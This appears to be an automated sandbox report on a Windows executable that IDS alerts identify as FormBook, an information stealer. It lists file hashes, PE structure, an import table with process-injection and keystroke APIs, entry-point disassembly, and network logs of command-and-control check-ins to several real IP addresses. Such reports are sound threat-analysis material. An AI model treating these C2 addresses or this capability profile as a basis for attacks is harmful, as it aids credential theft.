SHA-512: 62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious: false
Reputation: high, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\BLv4mI7zzY.exe
File Type: data
Category: dropped
Size (bytes): 287744
Entropy (8bit): 7.991802773963083
Encrypted: true
SSDEEP: 6144:hfm/nLick/szHmRlboIY1HLBwPaA0hm1c4s1Tk97wN:Rmji5uEYHePajoeP1Q97wN
MD5: 78866E970E924ABEDC1090F69D20FDEE
SHA1: D1350719810692695704CD3C1BE2033172F14347
SHA-256: 2E3D4AABA98D3078FB2A561BC2697ECACC6504CAB272D0927BD81E55413A894F
SHA-512: DC8260F160FC9654DA99DF0BFE08BE3168C35BC15D580A6D62E19FA51984D79CAE42221C6E55F81898D1E20010BD415AAC3FDB9AEB9558AF4C152FAEAFEE3AFC
Malicious: false
Reputation: low
                                                            Preview:...U[6DKF2QJ..BG.9UX6DKBrQJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJB.J9UV).EB.X.y.C....0_7k2@>-*+/g)X;6Y0k Wq8-$b.$...ed&-V4dUGHcJ9UX6DK;3X.e*%.wY2..$,.(..p" .#...x+%.K..~'-..1U,v"U.JXJBGJ9U.sDK.3PJ...'J9UX6DKB.QHYACLJ9.\6DKB2QJXJ.SJ9UH6DK26QJX.BGZ9UX4DKD2QJXJBGL9UX6DKB2!NXJ@GJ9UX6FK..QJHJBWJ9UX&DKR2QJXJBWJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJv>'?>9UXR.OB2AJXJ.CJ9EX6DKB2QJXJBGJ9uX6$KB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2
Process: C:\Users\user\Desktop\BLv4mI7zzY.exe
File Type: data
Category: dropped
Size (bytes): 287744
Entropy (8bit): 7.991802773963083
Encrypted: true
SSDEEP: 6144:hfm/nLick/szHmRlboIY1HLBwPaA0hm1c4s1Tk97wN:Rmji5uEYHePajoeP1Q97wN
MD5: 78866E970E924ABEDC1090F69D20FDEE
SHA1: D1350719810692695704CD3C1BE2033172F14347
SHA-256: 2E3D4AABA98D3078FB2A561BC2697ECACC6504CAB272D0927BD81E55413A894F
SHA-512: DC8260F160FC9654DA99DF0BFE08BE3168C35BC15D580A6D62E19FA51984D79CAE42221C6E55F81898D1E20010BD415AAC3FDB9AEB9558AF4C152FAEAFEE3AFC
Malicious: false
Reputation: low
                                                            Preview:...U[6DKF2QJ..BG.9UX6DKBrQJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJB.J9UV).EB.X.y.C....0_7k2@>-*+/g)X;6Y0k Wq8-$b.$...ed&-V4dUGHcJ9UX6DK;3X.e*%.wY2..$,.(..p" .#...x+%.K..~'-..1U,v"U.JXJBGJ9U.sDK.3PJ...'J9UX6DKB.QHYACLJ9.\6DKB2QJXJ.SJ9UH6DK26QJX.BGZ9UX4DKD2QJXJBGL9UX6DKB2!NXJ@GJ9UX6FK..QJHJBWJ9UX&DKR2QJXJBWJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJv>'?>9UXR.OB2AJXJ.CJ9EX6DKB2QJXJBGJ9uX6$KB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2QJXJBGJ9UX6DKB2
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.179308716914194
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: BLv4mI7zzY.exe
File size: 1'198'080 bytes
MD5: b6a92ee2ba34b81fa9484072b4d20072
SHA1: 0726cc609fcd36cdf9634faacce3d77d16c9129b
SHA256: 54b7de7fe1e5480be40821947816c7abbc49dcc98a307f8fb961405aa58b15c5
SHA512: 546c2f57a12aed5108d20c0a471d6f1ab9146b5a349dd00f3ee70c4cc0d46838861057732d44774cd4d6dfd3ab92bc81aa69c6660856a8fcdd1e0106295c8b41
SSDEEP: 24576:Wu6J33O0c+JY5UZ+XC0kGso6FavsTpoIVqHccj+0WY:4u0c++OCvkGs9FavsTpPkXjMY
TLSH: 6345CF2273DDC360CB669173BF69B7016EBF3C614630B95B2F880D7DA950162162DBA3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x427dcd
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x6769F347 [Mon Dec 23 23:33:27 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007F9ED552EFCAh
jmp 00007F9ED5521D94h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F9ED5521F1Ah
cmp edi, eax
jc 00007F9ED552227Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F9ED5521F19h
rep movsb
jmp 00007F9ED552222Ch
cmp ecx, 00000080h
jc 00007F9ED55220E4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F9ED5521F20h
bt dword ptr [004BE324h], 01h
jc 00007F9ED55223F0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F9ED55220BDh
test edi, 00000003h
jne 00007F9ED55220CEh
test esi, 00000003h
jne 00007F9ED55220ADh
bt edi, 02h
jnc 00007F9ED5521F1Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F9ED5521F23h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F9ED5521F75h
bt esi, 03h
jnc 00007F9ED5521FC8h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5bf18 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x123000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5bf18 | 0x5c000 | 0afaeae48652cdd9bcf5461505bdaafb | False | 0.9284376061480978 | data | 7.895878686080413 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x123000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x531df | data | | | 1.0003260419389801
RT_GROUP_ICON | 0x122998 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x122a10 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x122a24 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x122a38 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x122a4c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x122b28 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T05:39:48.471913+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 53765 | 162.218.30.235 | 80 | TCP
2025-01-11T05:39:48.471913+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 53765 | 162.218.30.235 | 80 | TCP
2025-01-11T05:40:13.477922+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 53767 | 13.228.81.39 | 80 | TCP
2025-01-11T05:40:16.043618+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 53768 | 13.228.81.39 | 80 | TCP
2025-01-11T05:40:18.584119+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 53769 | 13.228.81.39 | 80 | TCP
2025-01-11T05:40:21.142542+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 53770 | 13.228.81.39 | 80 | TCP
2025-01-11T05:40:21.142542+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 53770 | 13.228.81.39 | 80 | TCP
2025-01-11T05:40:35.162238+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 53771 | 209.74.79.40 | 80 | TCP
2025-01-11T05:40:37.704071+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 53772 | 209.74.79.40 | 80 | TCP
2025-01-11T05:40:40.244395+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 53774 | 209.74.79.40 | 80 | TCP
2025-01-11T05:40:42.945271+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 53775 | 209.74.79.40 | 80 | TCP
2025-01-11T05:40:42.945271+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 53775 | 209.74.79.40 | 80 | TCP
2025-01-11T05:40:50.123152+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 53776 | 47.254.140.255 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 05:39:04.469139099 CET | 53574 | 53 | 192.168.2.6 | 1.1.1.1
Jan 11, 2025 05:39:04.474013090 CET | 53 | 53574 | 1.1.1.1 | 192.168.2.6
Jan 11, 2025 05:39:04.476665974 CET | 53574 | 53 | 192.168.2.6 | 1.1.1.1
Jan 11, 2025 05:39:04.481601000 CET | 53 | 53574 | 1.1.1.1 | 192.168.2.6
Jan 11, 2025 05:39:04.946882963 CET | 53574 | 53 | 192.168.2.6 | 1.1.1.1
Jan 11, 2025 05:39:04.951885939 CET | 53 | 53574 | 1.1.1.1 | 192.168.2.6
Jan 11, 2025 05:39:04.951968908 CET | 53574 | 53 | 192.168.2.6 | 1.1.1.1
Jan 11, 2025 05:39:47.867605925 CET | 53765 | 80 | 192.168.2.6 | 162.218.30.235
Jan 11, 2025 05:39:47.872603893 CET | 80 | 53765 | 162.218.30.235 | 192.168.2.6
Jan 11, 2025 05:39:47.872740030 CET | 53765 | 80 | 192.168.2.6 | 162.218.30.235
Jan 11, 2025 05:39:47.882653952 CET | 53765 | 80 | 192.168.2.6 | 162.218.30.235
Jan 11, 2025 05:39:47.887568951 CET | 80 | 53765 | 162.218.30.235 | 192.168.2.6
Jan 11, 2025 05:39:48.471570015 CET | 80 | 53765 | 162.218.30.235 | 192.168.2.6
Jan 11, 2025 05:39:48.471611023 CET | 80 | 53765 | 162.218.30.235 | 192.168.2.6
Jan 11, 2025 05:39:48.471913099 CET | 53765 | 80 | 192.168.2.6 | 162.218.30.235
Jan 11, 2025 05:39:48.475152016 CET | 53765 | 80 | 192.168.2.6 | 162.218.30.235
Jan 11, 2025 05:39:48.479991913 CET | 80 | 53765 | 162.218.30.235 | 192.168.2.6
Jan 11, 2025 05:40:12.506225109 CET | 53767 | 80 | 192.168.2.6 | 13.228.81.39
